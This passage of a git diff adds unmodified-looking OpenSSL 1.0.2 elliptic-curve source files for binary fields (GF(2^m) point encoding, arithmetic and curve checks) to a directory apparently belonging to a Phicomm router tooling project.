+        ECerr(EC_F_EC_GF2M_SIMPLE_OCT2POINT, EC_R_INVALID_ENCODING);
+        return 0;
+    }
+
+    if (form == 0) {
+        if (len != 1) {
+            ECerr(EC_F_EC_GF2M_SIMPLE_OCT2POINT, EC_R_INVALID_ENCODING);
+            return 0;
+        }
+
+        return EC_POINT_set_to_infinity(group, point);
+    }
+
+    field_len = (EC_GROUP_get_degree(group) + 7) / 8;
+    enc_len =
+        (form ==
+         POINT_CONVERSION_COMPRESSED) ? 1 + field_len : 1 + 2 * field_len;
+
+    if (len != enc_len) {
+        ECerr(EC_F_EC_GF2M_SIMPLE_OCT2POINT, EC_R_INVALID_ENCODING);
+        return 0;
+    }
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    BN_CTX_start(ctx);
+    x = BN_CTX_get(ctx);
+    y = BN_CTX_get(ctx);
+    yxi = BN_CTX_get(ctx);
+    if (yxi == NULL)
+        goto err;
+
+    if (!BN_bin2bn(buf + 1, field_len, x))
+        goto err;
+    if (BN_ucmp(x, &group->field) >= 0) {
+        ECerr(EC_F_EC_GF2M_SIMPLE_OCT2POINT, EC_R_INVALID_ENCODING);
+        goto err;
+    }
+
+    if (form == POINT_CONVERSION_COMPRESSED) {
+        if (!EC_POINT_set_compressed_coordinates_GF2m
+            (group, point, x, y_bit, ctx))
+            goto err;
+    } else {
+        if (!BN_bin2bn(buf + 1 + field_len, field_len, y))
+            goto err;
+        if (BN_ucmp(y, &group->field) >= 0) {
+            ECerr(EC_F_EC_GF2M_SIMPLE_OCT2POINT, EC_R_INVALID_ENCODING);
+            goto err;
+        }
+        if (form == POINT_CONVERSION_HYBRID) {
+            if (!group->meth->field_div(group, yxi, y, x, ctx))
+                goto err;
+            if (y_bit != BN_is_odd(yxi)) {
+                ECerr(EC_F_EC_GF2M_SIMPLE_OCT2POINT, EC_R_INVALID_ENCODING);
+                goto err;
+            }
+        }
+
+        if (!EC_POINT_set_affine_coordinates_GF2m(group, point, x, y, ctx))
+            goto err;
+    }
+
+    /* test required by X9.62 */
+    if (!EC_POINT_is_on_curve(group, point, ctx)) {
+        ECerr(EC_F_EC_GF2M_SIMPLE_OCT2POINT, EC_R_POINT_IS_NOT_ON_CURVE);
+        goto err;
+    }
+
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec2_smpl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec2_smpl.c
new file mode 100644
index 0000000..077c7fc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec2_smpl.c
@@ -0,0 +1,797 @@
+/* crypto/ec/ec2_smpl.c */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * The Elliptic Curve Public-Key Crypto Library (ECC Code) included
+ * herein is developed by SUN MICROSYSTEMS, INC., and is contributed
+ * to the OpenSSL project.
+ *
+ * The ECC Code is licensed pursuant to the OpenSSL open source
+ * license provided below.
+ *
+ * The software is originally written by Sheueling Chang Shantz and
+ * Douglas Stebila of Sun Microsystems Laboratories.
+ *
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/err.h>
+
+#include "ec_lcl.h"
+
+#ifndef OPENSSL_NO_EC2M
+
+# ifdef OPENSSL_FIPS
+#  include <openssl/fips.h>
+# endif
+
+const EC_METHOD *EC_GF2m_simple_method(void)
+{
+    static const EC_METHOD ret = {
+        EC_FLAGS_DEFAULT_OCT,
+        NID_X9_62_characteristic_two_field,
+        ec_GF2m_simple_group_init,
+        ec_GF2m_simple_group_finish,
+        ec_GF2m_simple_group_clear_finish,
+        ec_GF2m_simple_group_copy,
+        ec_GF2m_simple_group_set_curve,
+        ec_GF2m_simple_group_get_curve,
+        ec_GF2m_simple_group_get_degree,
+        ec_GF2m_simple_group_check_discriminant,
+        ec_GF2m_simple_point_init,
+        ec_GF2m_simple_point_finish,
+        ec_GF2m_simple_point_clear_finish,
+        ec_GF2m_simple_point_copy,
+        ec_GF2m_simple_point_set_to_infinity,
+        0 /* set_Jprojective_coordinates_GFp */ ,
+        0 /* get_Jprojective_coordinates_GFp */ ,
+        ec_GF2m_simple_point_set_affine_coordinates,
+        ec_GF2m_simple_point_get_affine_coordinates,
+        0, 0, 0,
+        ec_GF2m_simple_add,
+        ec_GF2m_simple_dbl,
+        ec_GF2m_simple_invert,
+        ec_GF2m_simple_is_at_infinity,
+        ec_GF2m_simple_is_on_curve,
+        ec_GF2m_simple_cmp,
+        ec_GF2m_simple_make_affine,
+        ec_GF2m_simple_points_make_affine,
+
+        /*
+         * the following three method functions are defined in ec2_mult.c
+         */
+        ec_GF2m_simple_mul,
+        ec_GF2m_precompute_mult,
+        ec_GF2m_have_precompute_mult,
+
+        ec_GF2m_simple_field_mul,
+        ec_GF2m_simple_field_sqr,
+        ec_GF2m_simple_field_div,
+        0 /* field_encode */ ,
+        0 /* field_decode */ ,
+        0                       /* field_set_to_one */
+    };
+
+# ifdef OPENSSL_FIPS
+    if (FIPS_mode())
+        return fips_ec_gf2m_simple_method();
+# endif
+
+    return &ret;
+}
+
+/*
+ * Initialize a GF(2^m)-based EC_GROUP structure. Note that all other members
+ * are handled by EC_GROUP_new.
+ */
+int ec_GF2m_simple_group_init(EC_GROUP *group)
+{
+    BN_init(&group->field);
+    BN_init(&group->a);
+    BN_init(&group->b);
+    return 1;
+}
+
+/*
+ * Free a GF(2^m)-based EC_GROUP structure. Note that all other members are
+ * handled by EC_GROUP_free.
+ */
+void ec_GF2m_simple_group_finish(EC_GROUP *group)
+{
+    BN_free(&group->field);
+    BN_free(&group->a);
+    BN_free(&group->b);
+}
+
+/*
+ * Clear and free a GF(2^m)-based EC_GROUP structure. Note that all other
+ * members are handled by EC_GROUP_clear_free.
+ */
+void ec_GF2m_simple_group_clear_finish(EC_GROUP *group)
+{
+    BN_clear_free(&group->field);
+    BN_clear_free(&group->a);
+    BN_clear_free(&group->b);
+    group->poly[0] = 0;
+    group->poly[1] = 0;
+    group->poly[2] = 0;
+    group->poly[3] = 0;
+    group->poly[4] = 0;
+    group->poly[5] = -1;
+}
+
+/*
+ * Copy a GF(2^m)-based EC_GROUP structure. Note that all other members are
+ * handled by EC_GROUP_copy.
+ */
+int ec_GF2m_simple_group_copy(EC_GROUP *dest, const EC_GROUP *src)
+{
+    int i;
+    if (!BN_copy(&dest->field, &src->field))
+        return 0;
+    if (!BN_copy(&dest->a, &src->a))
+        return 0;
+    if (!BN_copy(&dest->b, &src->b))
+        return 0;
+    dest->poly[0] = src->poly[0];
+    dest->poly[1] = src->poly[1];
+    dest->poly[2] = src->poly[2];
+    dest->poly[3] = src->poly[3];
+    dest->poly[4] = src->poly[4];
+    dest->poly[5] = src->poly[5];
+    if (bn_wexpand(&dest->a, (int)(dest->poly[0] + BN_BITS2 - 1) / BN_BITS2)
+        == NULL)
+        return 0;
+    if (bn_wexpand(&dest->b, (int)(dest->poly[0] + BN_BITS2 - 1) / BN_BITS2)
+        == NULL)
+        return 0;
+    for (i = dest->a.top; i < dest->a.dmax; i++)
+        dest->a.d[i] = 0;
+    for (i = dest->b.top; i < dest->b.dmax; i++)
+        dest->b.d[i] = 0;
+    return 1;
+}
+
+/* Set the curve parameters of an EC_GROUP structure. */
+int ec_GF2m_simple_group_set_curve(EC_GROUP *group,
+                                   const BIGNUM *p, const BIGNUM *a,
+                                   const BIGNUM *b, BN_CTX *ctx)
+{
+    int ret = 0, i;
+
+    /* group->field */
+    if (!BN_copy(&group->field, p))
+        goto err;
+    i = BN_GF2m_poly2arr(&group->field, group->poly, 6) - 1;
+    if ((i != 5) && (i != 3)) {
+        ECerr(EC_F_EC_GF2M_SIMPLE_GROUP_SET_CURVE, EC_R_UNSUPPORTED_FIELD);
+        goto err;
+    }
+
+    /* group->a */
+    if (!BN_GF2m_mod_arr(&group->a, a, group->poly))
+        goto err;
+    if (bn_wexpand(&group->a, (int)(group->poly[0] + BN_BITS2 - 1) / BN_BITS2)
+        == NULL)
+        goto err;
+    for (i = group->a.top; i < group->a.dmax; i++)
+        group->a.d[i] = 0;
+
+    /* group->b */
+    if (!BN_GF2m_mod_arr(&group->b, b, group->poly))
+        goto err;
+    if (bn_wexpand(&group->b, (int)(group->poly[0] + BN_BITS2 - 1) / BN_BITS2)
+        == NULL)
+        goto err;
+    for (i = group->b.top; i < group->b.dmax; i++)
+        group->b.d[i] = 0;
+
+    ret = 1;
+ err:
+    return ret;
+}
+
+/*
+ * Get the curve parameters of an EC_GROUP structure. If p, a, or b are NULL
+ * then there values will not be set but the method will return with success.
+ */
+int ec_GF2m_simple_group_get_curve(const EC_GROUP *group, BIGNUM *p,
+                                   BIGNUM *a, BIGNUM *b, BN_CTX *ctx)
+{
+    int ret = 0;
+
+    if (p != NULL) {
+        if (!BN_copy(p, &group->field))
+            return 0;
+    }
+
+    if (a != NULL) {
+        if (!BN_copy(a, &group->a))
+            goto err;
+    }
+
+    if (b != NULL) {
+        if (!BN_copy(b, &group->b))
+            goto err;
+    }
+
+    ret = 1;
+
+ err:
+    return ret;
+}
+
+/*
+ * Gets the degree of the field.  For a curve over GF(2^m) this is the value
+ * m.
+ */
+int ec_GF2m_simple_group_get_degree(const EC_GROUP *group)
+{
+    return BN_num_bits(&group->field) - 1;
+}
+
+/*
+ * Checks the discriminant of the curve. y^2 + x*y = x^3 + a*x^2 + b is an
+ * elliptic curve <=> b != 0 (mod p)
+ */
+int ec_GF2m_simple_group_check_discriminant(const EC_GROUP *group,
+                                            BN_CTX *ctx)
+{
+    int ret = 0;
+    BIGNUM *b;
+    BN_CTX *new_ctx = NULL;
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL) {
+            ECerr(EC_F_EC_GF2M_SIMPLE_GROUP_CHECK_DISCRIMINANT,
+                  ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    }
+    BN_CTX_start(ctx);
+    b = BN_CTX_get(ctx);
+    if (b == NULL)
+        goto err;
+
+    if (!BN_GF2m_mod_arr(b, &group->b, group->poly))
+        goto err;
+
+    /*
+     * check the discriminant: y^2 + x*y = x^3 + a*x^2 + b is an elliptic
+     * curve <=> b != 0 (mod p)
+     */
+    if (BN_is_zero(b))
+        goto err;
+
+    ret = 1;
+
+ err:
+    if (ctx != NULL)
+        BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+/* Initializes an EC_POINT. */
+int ec_GF2m_simple_point_init(EC_POINT *point)
+{
+    BN_init(&point->X);
+    BN_init(&point->Y);
+    BN_init(&point->Z);
+    return 1;
+}
+
+/* Frees an EC_POINT. */
+void ec_GF2m_simple_point_finish(EC_POINT *point)
+{
+    BN_free(&point->X);
+    BN_free(&point->Y);
+    BN_free(&point->Z);
+}
+
+/* Clears and frees an EC_POINT. */
+void ec_GF2m_simple_point_clear_finish(EC_POINT *point)
+{
+    BN_clear_free(&point->X);
+    BN_clear_free(&point->Y);
+    BN_clear_free(&point->Z);
+    point->Z_is_one = 0;
+}
+
+/*
+ * Copy the contents of one EC_POINT into another.  Assumes dest is
+ * initialized.
+ */
+int ec_GF2m_simple_point_copy(EC_POINT *dest, const EC_POINT *src)
+{
+    if (!BN_copy(&dest->X, &src->X))
+        return 0;
+    if (!BN_copy(&dest->Y, &src->Y))
+        return 0;
+    if (!BN_copy(&dest->Z, &src->Z))
+        return 0;
+    dest->Z_is_one = src->Z_is_one;
+
+    return 1;
+}
+
+/*
+ * Set an EC_POINT to the point at infinity. A point at infinity is
+ * represented by having Z=0.
+ */
+int ec_GF2m_simple_point_set_to_infinity(const EC_GROUP *group,
+                                         EC_POINT *point)
+{
+    point->Z_is_one = 0;
+    BN_zero(&point->Z);
+    return 1;
+}
+
+/*
+ * Set the coordinates of an EC_POINT using affine coordinates. Note that
+ * the simple implementation only uses affine coordinates.
+ */
+int ec_GF2m_simple_point_set_affine_coordinates(const EC_GROUP *group,
+                                                EC_POINT *point,
+                                                const BIGNUM *x,
+                                                const BIGNUM *y, BN_CTX *ctx)
+{
+    int ret = 0;
+    if (x == NULL || y == NULL) {
+        ECerr(EC_F_EC_GF2M_SIMPLE_POINT_SET_AFFINE_COORDINATES,
+              ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+
+    if (!BN_copy(&point->X, x))
+        goto err;
+    BN_set_negative(&point->X, 0);
+    if (!BN_copy(&point->Y, y))
+        goto err;
+    BN_set_negative(&point->Y, 0);
+    if (!BN_copy(&point->Z, BN_value_one()))
+        goto err;
+    BN_set_negative(&point->Z, 0);
+    point->Z_is_one = 1;
+    ret = 1;
+
+ err:
+    return ret;
+}
+
+/*
+ * Gets the affine coordinates of an EC_POINT. Note that the simple
+ * implementation only uses affine coordinates.
+ */
+int ec_GF2m_simple_point_get_affine_coordinates(const EC_GROUP *group,
+                                                const EC_POINT *point,
+                                                BIGNUM *x, BIGNUM *y,
+                                                BN_CTX *ctx)
+{
+    int ret = 0;
+
+    if (EC_POINT_is_at_infinity(group, point)) {
+        ECerr(EC_F_EC_GF2M_SIMPLE_POINT_GET_AFFINE_COORDINATES,
+              EC_R_POINT_AT_INFINITY);
+        return 0;
+    }
+
+    if (BN_cmp(&point->Z, BN_value_one())) {
+        ECerr(EC_F_EC_GF2M_SIMPLE_POINT_GET_AFFINE_COORDINATES,
+              ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return 0;
+    }
+    if (x != NULL) {
+        if (!BN_copy(x, &point->X))
+            goto err;
+        BN_set_negative(x, 0);
+    }
+    if (y != NULL) {
+        if (!BN_copy(y, &point->Y))
+            goto err;
+        BN_set_negative(y, 0);
+    }
+    ret = 1;
+
+ err:
+    return ret;
+}
+
+/*
+ * Computes a + b and stores the result in r.  r could be a or b, a could be
+ * b. Uses algorithm A.10.2 of IEEE P1363.
+ */
+int ec_GF2m_simple_add(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a,
+                       const EC_POINT *b, BN_CTX *ctx)
+{
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *x0, *y0, *x1, *y1, *x2, *y2, *s, *t;
+    int ret = 0;
+
+    if (EC_POINT_is_at_infinity(group, a)) {
+        if (!EC_POINT_copy(r, b))
+            return 0;
+        return 1;
+    }
+
+    if (EC_POINT_is_at_infinity(group, b)) {
+        if (!EC_POINT_copy(r, a))
+            return 0;
+        return 1;
+    }
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    BN_CTX_start(ctx);
+    x0 = BN_CTX_get(ctx);
+    y0 = BN_CTX_get(ctx);
+    x1 = BN_CTX_get(ctx);
+    y1 = BN_CTX_get(ctx);
+    x2 = BN_CTX_get(ctx);
+    y2 = BN_CTX_get(ctx);
+    s = BN_CTX_get(ctx);
+    t = BN_CTX_get(ctx);
+    if (t == NULL)
+        goto err;
+
+    if (a->Z_is_one) {
+        if (!BN_copy(x0, &a->X))
+            goto err;
+        if (!BN_copy(y0, &a->Y))
+            goto err;
+    } else {
+        if (!EC_POINT_get_affine_coordinates_GF2m(group, a, x0, y0, ctx))
+            goto err;
+    }
+    if (b->Z_is_one) {
+        if (!BN_copy(x1, &b->X))
+            goto err;
+        if (!BN_copy(y1, &b->Y))
+            goto err;
+    } else {
+        if (!EC_POINT_get_affine_coordinates_GF2m(group, b, x1, y1, ctx))
+            goto err;
+    }
+
+    if (BN_GF2m_cmp(x0, x1)) {
+        if (!BN_GF2m_add(t, x0, x1))
+            goto err;
+        if (!BN_GF2m_add(s, y0, y1))
+            goto err;
+        if (!group->meth->field_div(group, s, s, t, ctx))
+            goto err;
+        if (!group->meth->field_sqr(group, x2, s, ctx))
+            goto err;
+        if (!BN_GF2m_add(x2, x2, &group->a))
+            goto err;
+        if (!BN_GF2m_add(x2, x2, s))
+            goto err;
+        if (!BN_GF2m_add(x2, x2, t))
+            goto err;
+    } else {
+        if (BN_GF2m_cmp(y0, y1) || BN_is_zero(x1)) {
+            if (!EC_POINT_set_to_infinity(group, r))
+                goto err;
+            ret = 1;
+            goto err;
+        }
+        if (!group->meth->field_div(group, s, y1, x1, ctx))
+            goto err;
+        if (!BN_GF2m_add(s, s, x1))
+            goto err;
+
+        if (!group->meth->field_sqr(group, x2, s, ctx))
+            goto err;
+        if (!BN_GF2m_add(x2, x2, s))
+            goto err;
+        if (!BN_GF2m_add(x2, x2, &group->a))
+            goto err;
+    }
+
+    if (!BN_GF2m_add(y2, x1, x2))
+        goto err;
+    if (!group->meth->field_mul(group, y2, y2, s, ctx))
+        goto err;
+    if (!BN_GF2m_add(y2, y2, x2))
+        goto err;
+    if (!BN_GF2m_add(y2, y2, y1))
+        goto err;
+
+    if (!EC_POINT_set_affine_coordinates_GF2m(group, r, x2, y2, ctx))
+        goto err;
+
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+/*
+ * Computes 2 * a and stores the result in r.  r could be a. Uses algorithm
+ * A.10.2 of IEEE P1363.
+ */
+int ec_GF2m_simple_dbl(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a,
+                       BN_CTX *ctx)
+{
+    return ec_GF2m_simple_add(group, r, a, a, ctx);
+}
+
+int ec_GF2m_simple_invert(const EC_GROUP *group, EC_POINT *point, BN_CTX *ctx)
+{
+    if (EC_POINT_is_at_infinity(group, point) || BN_is_zero(&point->Y))
+        /* point is its own inverse */
+        return 1;
+
+    if (!EC_POINT_make_affine(group, point, ctx))
+        return 0;
+    return BN_GF2m_add(&point->Y, &point->X, &point->Y);
+}
+
+/* Indicates whether the given point is the point at infinity. */
+int ec_GF2m_simple_is_at_infinity(const EC_GROUP *group,
+                                  const EC_POINT *point)
+{
+    return BN_is_zero(&point->Z);
+}
+
+/*-
+ * Determines whether the given EC_POINT is an actual point on the curve defined
+ * in the EC_GROUP.  A point is valid if it satisfies the Weierstrass equation:
+ *      y^2 + x*y = x^3 + a*x^2 + b.
+ */
+int ec_GF2m_simple_is_on_curve(const EC_GROUP *group, const EC_POINT *point,
+                               BN_CTX *ctx)
+{
+    int ret = -1;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *lh, *y2;
+    int (*field_mul) (const EC_GROUP *, BIGNUM *, const BIGNUM *,
+                      const BIGNUM *, BN_CTX *);
+    int (*field_sqr) (const EC_GROUP *, BIGNUM *, const BIGNUM *, BN_CTX *);
+
+    if (EC_POINT_is_at_infinity(group, point))
+        return 1;
+
+    field_mul = group->meth->field_mul;
+    field_sqr = group->meth->field_sqr;
+
+    /* only support affine coordinates */
+    if (!point->Z_is_one)
+        return -1;
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return -1;
+    }
+
+    BN_CTX_start(ctx);
+    y2 = BN_CTX_get(ctx);
+    lh = BN_CTX_get(ctx);
+    if (lh == NULL)
+        goto err;
+
+    /*-
+     * We have a curve defined by a Weierstrass equation
+     *      y^2 + x*y = x^3 + a*x^2 + b.
+     *  <=> x^3 + a*x^2 + x*y + b + y^2 = 0
+     *  <=> ((x + a) * x + y ) * x + b + y^2 = 0
+     */
+    if (!BN_GF2m_add(lh, &point->X, &group->a))
+        goto err;
+    if (!field_mul(group, lh, lh, &point->X, ctx))
+        goto err;
+    if (!BN_GF2m_add(lh, lh, &point->Y))
+        goto err;
+    if (!field_mul(group, lh, lh, &point->X, ctx))
+        goto err;
+    if (!BN_GF2m_add(lh, lh, &group->b))
+        goto err;
+    if (!field_sqr(group, y2, &point->Y, ctx))
+        goto err;
+    if (!BN_GF2m_add(lh, lh, y2))
+        goto err;
+    ret = BN_is_zero(lh);
+ err:
+    if (ctx)
+        BN_CTX_end(ctx);
+    if (new_ctx)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+/*-
+ * Indicates whether two points are equal.
+ * Return values:
+ *  -1   error
+ *   0   equal (in affine coordinates)
+ *   1   not equal
+ */
+int ec_GF2m_simple_cmp(const EC_GROUP *group, const EC_POINT *a,
+                       const EC_POINT *b, BN_CTX *ctx)
+{
+    BIGNUM *aX, *aY, *bX, *bY;
+    BN_CTX *new_ctx = NULL;
+    int ret = -1;
+
+    if (EC_POINT_is_at_infinity(group, a)) {
+        return EC_POINT_is_at_infinity(group, b) ? 0 : 1;
+    }
+
+    if (EC_POINT_is_at_infinity(group, b))
+        return 1;
+
+    if (a->Z_is_one && b->Z_is_one) {
+        return ((BN_cmp(&a->X, &b->X) == 0)
+                && BN_cmp(&a->Y, &b->Y) == 0) ? 0 : 1;
+    }
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return -1;
+    }
+
+    BN_CTX_start(ctx);
+    aX = BN_CTX_get(ctx);
+    aY = BN_CTX_get(ctx);
+    bX = BN_CTX_get(ctx);
+    bY = BN_CTX_get(ctx);
+    if (bY == NULL)
+        goto err;
+
+    if (!EC_POINT_get_affine_coordinates_GF2m(group, a, aX, aY, ctx))
+        goto err;
+    if (!EC_POINT_get_affine_coordinates_GF2m(group, b, bX, bY, ctx))
+        goto err;
+    ret = ((BN_cmp(aX, bX) == 0) && BN_cmp(aY, bY) == 0) ? 0 : 1;
+
+ err:
+    if (ctx)
+        BN_CTX_end(ctx);
+    if (new_ctx)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+/* Forces the given EC_POINT to internally use affine coordinates. */
+int ec_GF2m_simple_make_affine(const EC_GROUP *group, EC_POINT *point,
+                               BN_CTX *ctx)
+{
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *x, *y;
+    int ret = 0;
+
+    if (point->Z_is_one || EC_POINT_is_at_infinity(group, point))
+        return 1;
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    BN_CTX_start(ctx);
+    x = BN_CTX_get(ctx);
+    y = BN_CTX_get(ctx);
+    if (y == NULL)
+        goto err;
+
+    if (!EC_POINT_get_affine_coordinates_GF2m(group, point, x, y, ctx))
+        goto err;
+    if (!BN_copy(&point->X, x))
+        goto err;
+    if (!BN_copy(&point->Y, y))
+        goto err;
+    if (!BN_one(&point->Z))
+        goto err;
+
+    ret = 1;
+
+ err:
+    if (ctx)
+        BN_CTX_end(ctx);
+    if (new_ctx)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+/*
+ * Forces each of the EC_POINTs in the given array to use affine coordinates.
+ */
+int ec_GF2m_simple_points_make_affine(const EC_GROUP *group, size_t num,
+                                      EC_POINT *points[], BN_CTX *ctx)
+{
+    size_t i;
+
+    for (i = 0; i < num; i++) {
+        if (!group->meth->make_affine(group, points[i], ctx))
+            return 0;
+    }
+
+    return 1;
+}
+
+/* Wrapper to simple binary polynomial field multiplication implementation. */
+int ec_GF2m_simple_field_mul(const EC_GROUP *group, BIGNUM *r,
+                             const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx)
+{
+    return BN_GF2m_mod_mul_arr(r, a, b, group->poly, ctx);
+}
+
+/* Wrapper to simple binary polynomial field squaring implementation. */
+int ec_GF2m_simple_field_sqr(const EC_GROUP *group, BIGNUM *r,
+                             const BIGNUM *a, BN_CTX *ctx)
+{
+    return BN_GF2m_mod_sqr_arr(r, a, group->poly, ctx);
+}
+
+/* Wrapper to simple binary polynomial field division implementation. */
+int ec_GF2m_simple_field_div(const EC_GROUP *group, BIGNUM *r,
+                             const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx)
+{
+    return BN_GF2m_mod_div(r, a, b, &group->field, ctx);
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_ameth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_ameth.c
new file mode 100644
index 0000000..83e208c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_ameth.c
@@ -0,0 +1,965 @@
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/ec.h>
+#include <openssl/bn.h>
+#ifndef OPENSSL_NO_CMS
+# include <openssl/cms.h>
+#endif
+#include <openssl/asn1t.h>
+#include "asn1_locl.h"
+
+static int ecdh_cms_decrypt(CMS_RecipientInfo *ri);
